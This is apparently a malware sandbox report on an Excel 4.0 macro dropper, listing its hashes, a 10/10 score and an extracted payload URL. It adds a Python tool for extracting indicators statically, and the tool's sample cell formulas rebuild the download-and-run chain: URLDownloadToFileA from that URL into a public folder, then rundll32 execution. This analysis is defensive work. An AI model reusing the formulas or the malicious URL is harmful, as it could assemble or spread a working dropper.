General

  • Target

    d91023950ba37d19b2668deefae370d0_JaffaCakes118

  • Size

    50KB

  • Sample

    240910-1czwtswdpj

  • MD5

    d91023950ba37d19b2668deefae370d0

  • SHA1

    09ce36cce76ef3dc51953b04f784637681cc7616

  • SHA256

    11bc50af49acfd081f56f7b0702e1793cad368b49574aa93d3ad39668109a9a9

  • SHA512

    1f2407539d844d356c87e2d5766f191548cdc26d9d787b900264ff077c3391aae90f287360395eaf1d2c7a8dec4ac6465f5b72c9f3a77e1a9a88c5cadd5ec6b3

  • SSDEEP

    1536:8/7uDphYHceXVhca+fMHLtyeGxcl8/dgmD6yzsF6BCKhOkF+QN:8/7uDphYHceXVhca+fMHLtyeGxcl8/dx

Score
10/10

Malware Config

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    http://foundation.shanto-mariamfoundation.org/24.gif
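
The extracted config above comes from an Excel 4.0 (XLM) macro sheet whose formulas download a payload from the listed URL. The script below is an added example, not the sandbox's own extractor, showing how such a config is recovered statically: inline CHAR() bytes and cell references, join the string fragments, then pull URLs, drop paths, CALL targets and EXEC commands out of the resolved formula text. Only the URL is taken from the report; the cell formulas, the drop path, the rundll32 command and the "xlm40.dropper"/"xlm40.other" labels are constructed assumptions. Real samples are first dumped to formula text with an XLM-aware parser (for example oletools' olevba) before this step.

```python
"""Static config extraction for an Excel 4.0 (XLM) macro dropper.

Added example, not the sandbox's own extractor. The cell formulas below are
CONSTRUCTED to show the common urlmon/EXEC dropper pattern; only the URL is
taken from the report.
"""
import json
import re
from typing import Dict, List, Tuple

REPORT_URL = "http://foundation.shanto-mariamfoundation.org/24.gif"  # from the report

# Constructed macro sheet (assumption, not recovered from the sample): A1 hides
# the scheme behind CHAR(), A2 builds the drop path by concatenation,
# A3 downloads, A4 executes the dropped file, A5 halts the macro.
SAMPLE_CELLS: Dict[str, str] = {
    "A1": '=CHAR(104)&CHAR(116)&CHAR(116)&CHAR(112)&"://foundation.shanto-mariamfoundation.org/24.gif"',
    "A2": '="C:\\Users\\Public\\"&"24.gif"',
    "A3": '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,A1,A2,0,0)',
    "A4": '=EXEC("rundll32 "&A2&",DllRegisterServer")',
    "A5": "=HALT()",
}

CHAR_RE = re.compile(r"CHAR\((\d+)\)")
# An A1-style reference that is not glued to a preceding identifier or quote.
REF_RE = re.compile(r'(?<![A-Za-z"])\$?([A-Z]{1,2})\$?(\d{1,4})(?![\w"(])')
URL_RE = re.compile(r'https?://[^\s"\'()<>]+')
PATH_RE = re.compile(r'[A-Za-z]:\\[^"\s,]+')
CALL_RE = re.compile(r'CALL\("([^"]+)","([^"]+)"')
EXEC_RE = re.compile(r'EXEC\("([^"]*)"\)')


def resolve(formula: str, cells: Dict[str, str], depth: int = 0) -> str:
    """Inline CHAR() bytes and referenced cells, then join "a"&"b" literals.

    Depth-limited so a self-referencing cell cannot recurse forever.
    """
    if depth > 8:
        return formula
    text = formula.lstrip("=")
    text = CHAR_RE.sub(lambda m: '"' + chr(int(m.group(1))) + '"', text)

    def inline(m):
        key = m.group(1) + m.group(2)
        if key in cells:
            return resolve(cells[key], cells, depth + 1)
        return m.group(0)

    text = REF_RE.sub(inline, text)
    return text.replace('"&"', "")  # "h"&"ttp" -> "http"


def _add(target: List, item) -> None:
    if item not in target:
        target.append(item)


def extract_config(cells: Dict[str, str]) -> dict:
    """Walk every cell's resolved text and collect dropper indicators."""
    cfg: dict = {"urls": [], "paths": [], "calls": [], "exec": []}
    for key in cells:
        text = resolve(cells[key], cells)
        for url in URL_RE.findall(text):
            _add(cfg["urls"], url)
        for path in PATH_RE.findall(text):
            _add(cfg["paths"], path)
        for dll, func in CALL_RE.findall(text):
            _add(cfg["calls"], (dll, func))
        for cmd in EXEC_RE.findall(text):
            _add(cfg["exec"], cmd)
    return cfg


def classify(cfg: dict) -> str:
    """Assumed meaning of the report's Source label: a URLDownloadToFile call,
    a URL and an executed command together make an "xlm40.dropper"."""
    downloads = any(f.lower().startswith("urldownloadtofile") for _, f in cfg["calls"])
    if downloads and cfg["urls"] and cfg["exec"]:
        return "xlm40.dropper"
    return "xlm40.other"


if __name__ == "__main__":
    config = extract_config(SAMPLE_CELLS)
    print(json.dumps({"language": "xlm4.0", "source": classify(config), **config}, indent=2))
```

The resolver is deliberately naive (no evaluation of FORMULA(), REGISTER() or loop constructs), which is enough for the concatenation and CHAR() tricks shown; heavier obfuscation needs an emulator, but the indicator regexes apply unchanged to whatever string values the emulator produces.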

Targets

    • Target

      d91023950ba37d19b2668deefae370d0_JaffaCakes118

    • Size

      50KB

    • MD5

      d91023950ba37d19b2668deefae370d0

    • SHA1

      09ce36cce76ef3dc51953b04f784637681cc7616

    • SHA256

      11bc50af49acfd081f56f7b0702e1793cad368b49574aa93d3ad39668109a9a9

    • SHA512

      1f2407539d844d356c87e2d5766f191548cdc26d9d787b900264ff077c3391aae90f287360395eaf1d2c7a8dec4ac6465f5b72c9f3a77e1a9a88c5cadd5ec6b3

    • SSDEEP

      1536:8/7uDphYHceXVhca+fMHLtyeGxcl8/dgmD6yzsF6BCKhOkF+QN:8/7uDphYHceXVhca+fMHLtyeGxcl8/dx

    Score
    10/10
    • Process spawned suspicious child process

      This child process is normally not spawned unless, for example, the parent process crashes. Its presence therefore typically indicates an unsuccessful attempt to compromise the parent process.

MITRE ATT&CK Enterprise v15

Tasks